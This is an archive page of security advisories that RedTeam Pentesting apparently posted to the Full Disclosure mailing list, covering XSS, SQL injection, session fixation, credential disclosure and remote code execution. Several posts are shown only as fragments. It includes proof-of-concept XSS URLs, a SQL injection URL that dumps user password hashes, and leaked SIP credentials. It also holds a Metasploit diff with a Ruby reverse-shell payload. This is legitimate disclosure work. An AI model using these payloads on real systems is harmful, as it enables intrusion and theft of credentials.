Pentesting');a=function(){a({x:'

The result is a notification showing the text "RedTeam Pentesting". The
value of the variable $_SERVER['PHP_SELF'] is embedded in verbatim into
the HTML source code of the resulting web page.


Workaround
==

The file example_form.ajax.php should be deleted from the Securimage
directory on a web server.


Fix
===

Update to version 3.6.4.


Security Risk
=

This security vulnerability is rated as a high risk. It allows executing
arbitrary JavaScript code in users' browsers if they access URLs
prepared by attackers. This provides many possibilities for further
attacks against these users. Since Securimage is usually used as a
software library to provide CAPTCHA functionality for web applications,
the vulnerability could be used to exploit all web applications hosted
on the same domain.


Timeline


2016-02-03 Vulnerability identified
2016-02-12 Customer approved disclosure to vendor
2016-02-23 CVE number requested
2016-02-24 CVE number not assigned, "non-prioritized product"
2016-03-02 Vendor contacted
2016-03-03 Vendor releases fixed version
2016-03-22 Advisory released


References
==

https://www.phpcaptcha.org/uncategorized/securimage-3-6-4-released/


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/

-- 
RedTeam Pentesting GmbH   Tel.: +49

[FD] [RT-SA-2014-014] AVM FRITZ!Box: Arbitrary Code Execution Through Manipulated Firmware Images

2016-01-07 Thread RedTeam Pentesting GmbH
assigned
2014-11-17 Vendor provided fixed version to RedTeam Pentesting
2015-07-16 Vendor started releasing fixed versions (7490 [0])
2015-10-01 Vendor finished releasing fixed versions (other models)
2016-01-07 Advisory released


References
==

[0] https://avm.de/service/sicherheitshinweise/


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


pgpV_yHjm4V8o.pgp
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2015-005] o2/Telefonica Germany: ACS Discloses VoIP/SIP Credentials

2016-01-07 Thread RedTeam Pentesting GmbH
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.Line.1.SIP.X_AVM-DE_CLIRType
  
  5


  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.PSTNFailOver
  
  0


  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.DTMFMethod
  
  RFC2833


  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.SIP.OutboundProxy
  
  sip.alice-voip.de


  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.SIP.UserAgentDomain
  
  sip.alice-voip.de


  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.SIP.RegistrarServer
  
  sip.alice-voip.de


  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.SIP.ProxyServer
  
  sip.alice-voip.de


  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.Line.1.SIP.AuthPassword
  
  0241463x


  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.Line.1.DirectoryNumber
  
  463x


  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.Line.1.SIP.AuthUserName
  
  49241463x

  
  39315850

  


[msg24] CPE -> ACS B:
-


http://schemas.xmlsoap.org/soap/envelope/;
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/;
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance;
xmlns:xsd="http://www.w3.org/2001/XMLSchema;
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
  
393158501
  
  

  0

  


[msg25] CPE <- ACS B:
-

[empty]



Workaround
==

o2 implemented countermeasures that prevent attackers from spoofing a
victim's IP address in CWMP messages. This prevents attackers from
retrieving arbitrary o2 customers' VoIP credentials.


Fix
===

The CPE needs to be properly authenticated when communicating with the
ACS. One option of doing so would be to provide the password of the DSL
connection. This password is already known to the CPE as it has been
entered manually by the customer during the initial setup process.


Security Risk
=

This vulnerability allows the unauthorised usage of foreign VoIP
telephone numbers. The victim will be charged with all costs resulting
from fraudulent phone calls. Furthermore, an attacker may answer phone
calls on behalf of the victim. Customers have no means of defending
oneself from such an attack. Chances are that the attack will be
noticed only by customers who regularly check their invoice. The
vulnerability is therefore considered to pose a high risk.


Timeline


2014-09-08 - Potential vulnerability discovered
2014-09-20 - Vulnerability verified
2014-10-17 - ISP was notified about the vulnerability
2014-10-17 - ISP implemented first countermeasures
2014-10-24 - ISP wants to investigate further
2014-11-28 - ISP needs more time, depends on hardware manufacturer
2015-01-23 - ISP is still investigating, wants to permanently solve the
 problem
2015-03-31 - ISP is still working on the problem, asks for more time
2015-06-12 - ISP wants to notify the proper German authorities about the
 problem first while working on a solution
2015-06-18 - ISP notified German authorities (Bundesnetzagentur, BfDI,
     BSI)
2016-01-08 - Advisory released


References
==

[0] 
https://www.iol.unh.edu/sites/default/files/knowledgebase/hnc/TR-069_Crash_Course.pdf


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


pgpa1AvukOibQ.pgp
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2015-013] Symfony PHP Framework: Session Fixation In "Remember Me" Login Functionality

2015-12-22 Thread RedTeam Pentesting GmbH
ehow got in possession of the cookie's value or has
successfully set a given cookie value in the user's browser at some
point in the past, the attacker is now able to access the web
application with the user's permissions:

$ curl -s -i 'http://localhost:8000/en/admin/post/' \
-b 'PHPSESSID=redteam'
HTTP/1.1 200 OK
Host: localhost:8000
[...]



[...]

In hac habitasse platea dictumst
anna_ad...@symfony.com
8/23/15, 10:16 AM
[...]


Workaround
==

Disable the "Remember Me" login functionality within the configuration
file security.yml.


Fix
===

Upgrade to a fixed version if possible, otherwise refer to section
Workaround.


Security Risk
=

The described vulnerability allows an attacker to access a Symfony web
application with the attacked user's permissions. The attack requires
that the "Remember Me" login functionality is used by the application.
Additionally, the attacker either got access to the PHPSESSID cookie
value or has successfully set a new value in the user's browser. Because
of its requirements, the described vulnerability poses a low risk only.
The risk estimation may be increased to medium or high based on the
affected web application and the accessible data.


Timeline


2015-09-11 Vulnerability identified
2015-09-16 Customer approved disclosure to vendor
2015-10-27 Vendor notified
2015-11-23 Fixed by vendor [2]
2015-12-22 Advisory released


References
==

[0] https://github.com/symfony/symfony-demo
[1] https://symfony.com/doc/current/cookbook/security/remember_me.html
[2] 
https://symfony.com/blog/cve-2015-8124-session-fixation-in-the-remember-me-login-feature


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


pgpLGWgFI5Ifs.pgp
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2015-002] SQL Injection in TYPO3 Extension Akronymmanager

2015-06-15 Thread RedTeam Pentesting GmbH
Advisory: SQL Injection in TYPO3 Extension Akronymmanager

An SQL injection vulnerability in the TYPO3 extension Akronymmanager
allows authenticated attackers to inject SQL statements and thereby read
data from the TYPO3 database.


Details
===

Product: sb_akronymmanager
Affected Versions: =0.5.0
Fixed Versions: 7.0.0
Vulnerability Type: SQL Injection
Security Risk: medium
Vendor URL: http://typo3.org/extensions/repository/view/sb_akronymmanager
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-002
Advisory Status: published 
CVE: CVE-2015-2803
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2803


Introduction


The Acronym Manager adds special explanatory markup to acronyms, abbreviations
and foreign words on the whole site following the requirement to accessible web
content.

It provides a backend module to administer a list of words to generate new HTML
elements for explanatory markup.

(from the extension's documentation)


More Details


Users with the respective privileges can maintain acronyms through the
Akronymmanager extension pages in the TYPO3 backend web interface.

In the extension's file mod1/index.php, an SQL query is generated like
follows (line 357 and following):

[...]
$pageID = t3lib_div::_GET(id);
if ($pageID) $where = uid='$pageID' AND ;
$result = $GLOBALS['TYPO3_DB']-exec_SELECTquery('title,uid', 'pages',
$where.'hidden=0 AND deleted=0','sorting');
[...]

The value of the user-supplied HTTP GET parameter 'id' is used without
sanitizing it before its use in the subsequent SQL statement. Therefore,
attackers are able to manipulate the resulting SQL statement and inject
their own queries into the statement.


Proof of Concept


When requesting the following URL, the vulnerability is exploited to yield all
usernames and hashes from the TYPO3 be_users database:


http://www.example.org/typo3conf/ext/sb_akronymmanager/mod1/index.php?
id=379%27%20UNION%20SELECT%20(SELECT%20group_concat(username,%27:%27,password)
%20FROM%20be_users),2%20--%20


The login credentials are then embedded in the HTML page that is
returned: 

[...]
  !-- Section header --
  h2user1:$hash,user2:$hash[...]/h2
[...]


Workaround
==

Only give trusted users access to the Akronymmanager extension in the
TYPO3 backend.


Fix
===

Upgrade the extension to version 7.0.0.


Security Risk
=

An attacker who has access to the backend part of the Akronymmanager
extension may send SQL queries to the database. This can be used to read
arbitrary tables of the TYPO3 database and may ultimately result in a
privilege escalation if the TYPO3 users' password hashes can be cracked
efficiently. Depending on the database configuration, it might also be
possible to execute arbitrary commands on the database host.  As the
attack requires an attacker who already has backend access, the
vulnerability is estimated to pose only a medium risk.


Timeline


2015-02-25 Vulnerability identified
2015-03-04 Customer approved disclosure to vendor
2015-03-10 CVE number requested
2015-03-10 Vendor notified
2015-03-26 CVE number requested again
2015-03-31 CVE number assigned (request #2)
2015-03-31 Vendor notified again
2015-03-31 Vendor responded
2015-04-08 Vendor announced fixed version available at the end of April
2015-05-13 Requested update from vendor
2015-05-15 Vendor requests more time
2015-05-21 Requested update from vendor
2015-05-22 Vendor states that upload to extension registry doesn't work
2015-06-03 Requested update from vendor
2015-06-10 Vendor uploads new version to extension registry
2015-06-15 Advisory published



RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.


-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


signature.asc
Description: Digital signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http

[FD] [RT-SA-2015-003] Alcatel-Lucent OmniSwitch Web Interface Weak Session ID

2015-06-10 Thread RedTeam Pentesting GmbH
 affected versions
2015-06-10 Advisory released


References
==

[0] https://github.com/xmendez/wfuzz


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


signature.asc
Description: Digital signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2015-004] Alcatel-Lucent OmniSwitch Web Interface Cross-Site Request Forgery

2015-06-10 Thread RedTeam Pentesting GmbH
 on the switch for
future access. While a successful attack results in full access to the switch,
the attack is hard to exploit because attackers need to know the IP address of
the switch and get an administrative user to access an attacker-controlled web
page. The vulnerability is therefore rated as a medium risk.


Timeline


2015-03-16 Vulnerability identified
2015-03-25 Customer approves disclosure to vendor
2015-03-26 CVE number requested
2015-03-31 CVE number assigned
2015-04-01 Vendor notified
2015-04-02 Vendor acknowledged receipt of advisories
2015-04-08 Requested status update from vendor, vendor is investigating
2015-04-29 Requested status update from vendor, vendor is still investigating
2015-05-22 Requested status update from vendor
2015-05-27 Vendor is working on the issue
2015-06-05 Vendor notified customers
2015-06-08 Vendor provided details about affected versions
2015-06-10 Advisory released


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.


-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


signature.asc
Description: Digital signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2014-016] Directory Traversal and Arbitrary File Disclosure in hybris Commerce Software Suite

2015-02-18 Thread RedTeam Pentesting GmbH
}|-)



Workaround
==

Implement a new filter which validates file names and insert this filter
before hybris' own MediaFilter. The new filter should return an error
when a file outside the media directory is requested.


Fix
===

Upgrade to a fixed hybris version or apply the vendor's hot fix.


Security Risk
=

This vulnerability can be used to download files from the file system of
the server. This includes, among others, configuration files and the
hybris order logfile, which contains sensitive data. Therefore, the
vulnerability poses a high risk.


Timeline


2014-10-08 Vulnerability identified
2014-10-08 Customer notified vendor
2014-10-29 Vendor released fixed version
2014-11-11 CVE number requested
2014-11-12 Vendor requests more time to notify their customers
2014-11-14 CVE number assigned
2014-12-08 Vendor again requests more time to notify customers
2015-01-12 Vendor notifies customers again, agrees to release advisory
   on 2015-02-18
2015-02-17 Vendor requests more time to notify customers for the 3rd
   time, RedTeam Pentesting declines
2015-02-18 Advisory released


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


signature.asc
Description: Digital signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2014-013] Cross-Site Scripting in IBM Endpoint Manager Relay Diagnostics Page

2015-02-10 Thread RedTeam Pentesting GmbH
Advisory: Cross-Site Scripting in IBM Endpoint Manager Relay Diagnostics
  Page

During a penetration test, RedTeam Pentesting discovered that the IBM
Endpoint Manager Relay Diagnostics page allows anybody to persistently
store HTML and JavaScript code that is executed when the page is opened
in a browser.


Details
===

Product: IBM Endpoint Manager
Affected Versions:  9.1.x versions earlier than 9.1.1229,
9.2.x versions earlier than 9.2.1.48
Fixed Versions: 9.1.1229, 9.2.1.48
Vulnerability Type: Cross-Site Scripting
Security Risk: medium
Vendor URL: http://www-03.ibm.com/software/products/en/endpoint-manager-family
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-013
Advisory Status: published
CVE:  CVE-2014-6137
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6137


Introduction


IBM Endpoint Manager products - built on IBM BigFix technology - can
help you achieve smarter, faster endpoint management and security. These
products enable you to see and manage physical and virtual endpoints
including servers, desktops, notebooks, smartphones, tablets and
specialized equipment such as point-of-sale devices, ATMs and
self-service kiosks. Now you can rapidly remediate, protect and report
on endpoints in near real time.

(from the vendor's homepage)


More Details


Systems that run IBM Endpoint Manager (IEM, formerly Tivoli Endpoint
Manager, or TEM) components, such as TEM Root Servers or TEM Relays,
typically serve HTTP and HTTPS on port 52311. There, the server or relay
diagnostics page is normally accessible at the path /rd. That page can
be accessed without authentication and lets users query and modify
different information. For example, a TEM Relay can be instructed to
gather a specific version of a certain Fixlet site by requesting a URL
such as the following:

http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
  BESGatherMirrorNew.exe/-gatherversion
  ?Body=GatherSpecifiedVersion
  url=http://tem-root.example.com:52311/cgi-bin/bfgather.exe/actionsite
  version=1
  useCRC=0

The URL parameter url is susceptible to cross-site scripting. When the
following URL is requested, the browser executes the JavaScript code
provided in the parameter:

http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
  BESGatherMirrorNew.exe/-gatherversion
  ?Body=GatherSpecifiedVersion
  version=1
  url=http://;scriptalert(/XSS/)/script
  version=1
  useCRC=0

The value of that parameter is also stored in the TEM Relay's site list,
so that the embedded JavaScript code is executed whenever the
diagnostics page is opened in a browser:

$ curl http://tem-relay.example.com:52311/rd
[...]

select NAME=url
[...]
optionhttp://;scriptalert(/XSS/)/script/option
/select


Proof of Concept


http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
  BESGatherMirrorNew.exe/-gatherversion
  ?Body=GatherSpecifiedVersionversion=1
  url=http://;scriptalert(/XSS/)/script
  version=1
  useCRC=0


Fix
===

Upgrade IBM Endpoint Manager to version 9.1.1229 or 9.2.1.48.


Security Risk
=

As the relay diagnostics page is typically not frequented by
administrators and does not normally require authentication, it is
unlikely that the vulnerability can be exploited to automatically and
reliably attack administrative users and obtain their credentials.

Nevertheless, the ability to host arbitrary HTML and JavaScript code on
the relay diagnostics page, i.e. on a trusted system, may allow
attackers to conduct very convincing phishing attacks.

This vulnerability is therefore rated as a medium risk.


Timeline


2014-07-29 Vulnerability identified during a penetration test
2014-08-06 Customer approves disclosure to vendor
2014-09-03 Vendor notified
2015-01-13 Vendor releases security bulletin and software upgrade
2015-02-04 Customer approves public disclosure
2015-02-10 Advisory released


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.


-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


signature.asc
Description: Digital signature

[FD] [RT-SA-2014-015] Cross-site Scripting in Tapatalk Plugin for WoltLab Burning Board 4.0

2015-01-12 Thread RedTeam Pentesting GmbH
Advisory: Cross-site Scripting in Tapatalk Plugin for WoltLab Burning
  Board 4.0

RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability
in the Tapatalk plugin for the WoltLab Burning Board forum software,
which allows attackers to inject arbitrary JavaScript code via URL
parameters.


Details
===

Product: Tapatalk Plugin com.tapatalk.wbb4 for WoltLab Burning Board 4.0
Affected Versions: = 1.0.0
Fixed Versions: 1.1.2
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: https://tapatalk.com
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-015
Advisory Status: published
CVE: CVE-2014-8869
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8869


Introduction


Tapatalk is an app built for interacting with discussion forums on
mobile devices. It differs from a forum’s mobile web skin in that it
offers the speed of a native app and a streamlined unified interface for
every forum a user subscribes to. Tapatalk also creates a unique
eco-system that allows forums to be searched and discovered by millions
of Tapatalk users which in turn promotes content, new memberships, and
interactions.

(from Tapatalk's Homepage)


More Details


The Tapatalk extension includes the PHP script welcome.php at the path

com.tapatalk.wbb4/files/mobiquo/smartbanner/welcome.php

which is accessible via the URL

http://www.example.com/mobiquo/smartbanner/welcome.php

on systems using the plugin. It outputs JavaScript code that includes
improperly encoded values from the two URL parameters app_android_id
and app_kindle_url. Depending on which parameters is used, one of
their values is assigned to the PHP variable $byo:


?php
[...]
else if (isset($_GET['app_android_id']))
{
  $app_android_id = $_GET['app_android_id'];
  if ($app_android_id  $app_android_id != '-1')
$byo = app_android_id=$app_android_id;
}
else if (isset($_GET['app_kindle_url']))
{
  $app_kindle_url = $_GET['app_kindle_url'];
  if ($app_kindle_url  $app_kindle_url != '-1')
$byo = app_kindle_url=$app_kindle_url;
}


Later the $byo variable is used to build a URL without URL encoding it
and the URL is used without further encoding in a script element:


?php
[...]
$ads_url = $protocol.'tapatalk.com/welcome_screen.php'
.'?referer='.urlencode($referer)
.'code='.urlencode($code)
.'board_url='.urlencode($board_url)
.'lang='.urlencode($lang)
.$byo
.'callback=?';
[...]
?[...]

script$.getJSON(?php echo $ads_url; ?,function(data){
[...]



Proof of Concept


The following URL can be used to demonstrate the vulnerability:

http://www.example.com/mobiquo/smartbanner/welcome.php
  ?app_kindle_url=);alert('RedTeam Pentesting');/script!--

The result is a notification showing the text RedTeam Pentesting.


Workaround
==

The PHP function urlencode() should be used to encode the $byo variable
before building a URL with it.


Fix
===

Update the plugin to version 1.1.2.


Security Risk
=

This security vulnerability is rated as a high risk. It allows to
execute arbitrary JavaScript code in users' browsers if they access URLs
prepared by attackers. This provides many different possibilities for
further attacks against these users. Since the plugin is used for a
bulletin board, the vulnerability could be exploited to display a fake
login page and obtain credentials from users or administrators. The
vulnerability also affects other web applications hosted on the same
domain.


Timeline


2014-10-20 Vulnerability identified
2014-10-29 CVE number requested
2014-11-14 CVE number assigned
2014-11-26 Vendor notified via https://tapatalk.com/security.php
2014-12-16 Vendor notified again, received reply from vendor
2014-12-16 Vulnerability patched in SCM [0]
2014-12-23 Updated plugin released by vendor [1]
2015-01-08 Vendor updated release notes to mention XSS [2]
2015-01-12 Advisory released


References
==

[0] 
https://github.com/tapatalk/tapatalk-wbb/commit/71024545904024cea9d04a887fdc64b9a9b85871
[1] 
https://github.com/tapatalk/tapatalk-wbb/commit/31472f6fcfffacd698b0c20809c4a8fb3c4f32f9
[2] https://support.tapatalk.com/threads/19540/#post-146253


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security

[FD] CVE-2014-8870: Arbitrary Redirect in Tapatalk Plugin for WoltLab Burning Board 4.0

2015-01-12 Thread RedTeam Pentesting GmbH
The Tapatalk Plugin com.tapatalk.wbb4 for WoltLab Burning Board 4.0 prior to
version 1.1.2 allowed to redirect users to arbitrary URLs. This was possible by
specifying the target URL in the URL parameter board_url in URLs like the
following:

http://www.example.com/mobiquo/smartbanner/welcome.php?board_url=https://www.redteam-pentesting.de

CVE-2014-8870 was assigned to this issue.

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


pgpJHKIMmxNYT.pgp
Description: PGP signature

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2014-012] Unauthenticated Remote Code Execution in IBM Endpoint Manager Mobile Device Management Components

2014-12-02 Thread RedTeam Pentesting GmbH
 outside of the Rails process
-  # Otherwise, the session can be killed on timeout
+  # This stub tries to ensure that the payload runs outside of the Rails
+  # process Otherwise, the session can be killed on timeout
   #
   def detached_payload_stub(code)
   %Q^
 code = '#{ Rex::Text.encode_base64(code) }'.unpack(m0).first
-if RUBY_PLATFORM =~ /mswin|mingw|win32/
-  inp = IO.popen(ruby, wb) rescue nil
-  if inp
-inp.write(code)
-inp.close
-  end
+if RUBY_PLATFORM =~ /mswin|mingw|win32/ and inp = (IO.popen(ruby, wb) 
rescue nil)
+  inp.write(code)
+inp.close
 else
-  Kernel.fork do
+  def _fork
+begin
+  Kernel.fork
+rescue NotImplementedError
+  -1
+end
+  end
+  pid = _fork
+  if 0 == pid or -1 == pid
 eval(code)
   end
 end
@@ -234,7 +239,7 @@ class Metasploit3  Msf::Exploit::Remote
   'method' = datastore['HTTP_METHOD'],
 }, 25)
 if res  !res.get_cookies.empty?
-  match = 
res.get_cookies.match(/([_A-Za-z0-9]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+); /)
+  match = 
res.get_cookies.match(/([_A-Za-z0-9-]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+);/)
 end
 
 if match
diff --git a/modules/payloads/singles/ruby/shell_reverse_tcp.rb 
b/modules/payloads/singles/ruby/shell_reverse_tcp.rb
index f17c669..0100929 100644
--- a/modules/payloads/singles/ruby/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/ruby/shell_reverse_tcp.rb
@@ -37,8 +37,31 @@ module Metasploit3
   def ruby_string
 lhost = datastore['LHOST']
 lhost = [#{lhost}] if Rex::Socket.is_ipv6?(lhost)
-require 'socket';c=TCPSocket.new(\#{lhost}\, 
#{datastore['LPORT'].to_i}); +
-
$stdin.reopen(c);$stdout.reopen(c);$stderr.reopen(c);$stdin.each_line{|l|l=l.strip;next
 if l.length==0; +
-(IO.popen(l,\rb\){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil 
}
+ruby = -EOF
+require 'socket'
+c=TCPSocket.new(#{lhost}, #{datastore['LPORT'].to_i})
+def reopen(old, new)
+  begin
+old.reopen(new)
+  rescue IOError = e
+new
+  end
+end
+
+$stdin = reopen($stdin, c)
+$stdout = reopen($stdout, c)
+$stderr = reopen($stderr, c)
+$stdin.each_line{ |l| l=l.strip
+
+next if l.length==0
+
+(IO.popen(l,rb) { |fd|
+fd.each_line { |o|
+c.puts(o.strip)
+}
+}) rescue nil
+}
+EOF
+ruby
   end
 end



Workaround
==

It might be possible to binary patch the Java class files to use a
different secret_token value and redeploy the application. This is
untested, however.


Fix
===

Install version 9.0.60100 of the affected software components.


Security Risk
=

The vulnerability allows unauthenticated remote attackers to execute
arbitrary code with administrative privileges on the affected systems.
It is highly likely that a successful attack on the application server
can also be leveraged into a full compromise of all devices managed
through the product. This constitutes a high risk.


Timeline


2014-07-29 Vulnerability identified during a penetration test
2014-08-06 Customer approves disclosure to vendor
2014-08-15 Vendor notified, vendor acknowledges receiving the advisory
2014-09-03 Update requested from vendor
2014-09-05 Vendor promises to respond with more details
2014-09-26 Update requested from vendor
2014-09-30 Vendor promises to respond with more details
2014-10-16 Update requested from vendor
2014-10-16 Vendor responds with CVE-ID, plans release for mid-November
2014-11-06 More definite release schedule requested
2014-11-12 Vendor plans release for last week of November
2014-11-21 Additional details requested from vendor
2014-11-22 Vendor responds with details, postpones release to
   mid-December due to issues discovered during quality control
2014-12-01 Vendor announces imminent release
2014-12-01 Vendor releases security bulletin and software upgrade
2014-12-02 Customer approves public disclosure
2014-12-02 Advisory released


References
==

[0] 
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/rails_secret_deserialization.rb


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
